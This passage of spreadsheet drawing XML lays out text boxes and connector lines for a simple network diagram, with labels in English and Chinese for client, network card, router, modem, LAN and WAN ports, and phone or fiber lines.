            <a:t>net</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t>card</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6736080</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7096080</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="13" name="直接连接符 12"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7025640" y="1424940"/>
          <a:ext cx="360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6743700</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6743700</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>7620</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="14" name="直接连接符 13"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6656070" y="1108710"/>
          <a:ext cx="7543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6774180</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7109460</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>83820</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="15" name="TextBox 14"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7063740" y="1524000"/>
          <a:ext cx="3352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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>网线</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6576060</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6934200</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="17" name="TextBox 16"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6865620" y="518160"/>
          <a:ext cx="35814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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>LAN</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> port</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6141720</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6141720</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="18" name="直接连接符 17"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6046470" y="1664970"/>
          <a:ext cx="76962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5996940</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6370320</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="22" name="TextBox 21"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6286500" y="2042160"/>
          <a:ext cx="37338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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>WAN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t>port</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5151120</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>160020</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5151120</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>83820</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="26" name="直接连接符 25"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="5204460" y="1143000"/>
          <a:ext cx="47244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5783580</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>7620</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5783580</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="27" name="直接连接符 26"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="5688330" y="1687830"/>
          <a:ext cx="76962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5654040</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6012180</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="28" name="TextBox 27"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5943600" y="2026920"/>
          <a:ext cx="35814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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>LAN</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> port</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5128260</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5715000</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="30" name="TextBox 29"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5417820" y="670560"/>
          <a:ext cx="5867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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电话线口</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5783580</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6143580</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="35" name="直接连接符 34"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6073140" y="1424940"/>
          <a:ext cx="360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3810000</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4278000</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="36" name="直接连接符 35"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4099560" y="1424940"/>
          <a:ext cx="468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4800600</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5160600</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="37" name="直接连接符 36"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5090160" y="1424940"/>
          <a:ext cx="360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3124200</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3764280</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="38" name="TextBox 37"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3413760" y="1280160"/>
          <a:ext cx="640080" cy="304800"/>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1100"/>
            <a:t>Modem</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3131820</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3131820</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="39" name="直接连接符 38"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3185160" y="1135380"/>
          <a:ext cx="47244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3771900</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3771900</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="40" name="直接连接符 39"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3676650" y="1703070"/>
          <a:ext cx="76962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3642360</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4000500</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="41" name="TextBox 40"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3931920" y="2042160"/>
          <a:ext cx="35814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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>LAN</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> port</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3162300</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>121920</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3749040</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>160020</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="42" name="TextBox 41"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3451860" y="685800"/>
          <a:ext cx="5867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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电话线口</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2072640</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2667000</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="43" name="TextBox 42"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="2362200" y="1280160"/>
          <a:ext cx="594360" cy="304800"/>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1100"/>
            <a:t>Router</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2674620</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3142620</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="44" name="直接连接符 43"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="2964180" y="1424940"/>
          <a:ext cx="468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2674620</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2674620</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="45" name="直接连接符 44"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2586990" y="1177290"/>
          <a:ext cx="7543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2743200</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>99060</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3078480</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="46" name="TextBox 45"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3032760" y="1211580"/>
          <a:ext cx="3352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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>网线</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1950720</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2308860</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="47" name="TextBox 46"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="2240280" y="1988820"/>
          <a:ext cx="35814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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>LAN</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> port</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2080260</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>160020</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2080260</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="48" name="直接连接符 47"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1985010" y="1657350"/>
          <a:ext cx="76962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2560320</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2933700</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="49" name="TextBox 48"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="2849880" y="411480"/>
          <a:ext cx="37338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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>WAN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t>port</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>304800</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>556800</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="50" name="直接连接符 49"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="594360" y="1424940"/>
          <a:ext cx="252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60960</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>312420</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="51" name="TextBox 50"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="60960" y="1280160"/>
          <a:ext cx="541020" cy="304800"/>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1100"/>
            <a:t>Client</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>312420</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>312420</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="52" name="直接连接符 51"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="5400000">
          <a:off x="281940" y="1630680"/>
          <a:ext cx="6400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175260</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>480060</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="53" name="TextBox 52"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="464820" y="2080260"/>
          <a:ext cx="30480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r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>net</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" baseline="0"/>
            <a:t>card</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4015740</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4320540</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="55" name="TextBox 54"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4305300" y="1097280"/>
          <a:ext cx="30480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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>光纤</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3749040</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4251960</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="56" name="TextBox 55"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4038600" y="1546860"/>
          <a:ext cx="50292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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电话线</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4800600</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5105400</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="57" name="TextBox 56"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5090160" y="1112520"/>
          <a:ext cx="30480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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>光纤</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4937760</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5440680</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="58" name="TextBox 57"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5227320" y="1615440"/>
          <a:ext cx="50292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r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电话线</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>201000</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3007440</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="59" name="直接连接符 58"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm rot="10800000" flipV="1">
          <a:off x="201000" y="2430780"/>
          <a:ext cx="3096000" cy="22860"/>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6263640</xdr:colOff>
      <xdr:row>13</xdr:row>
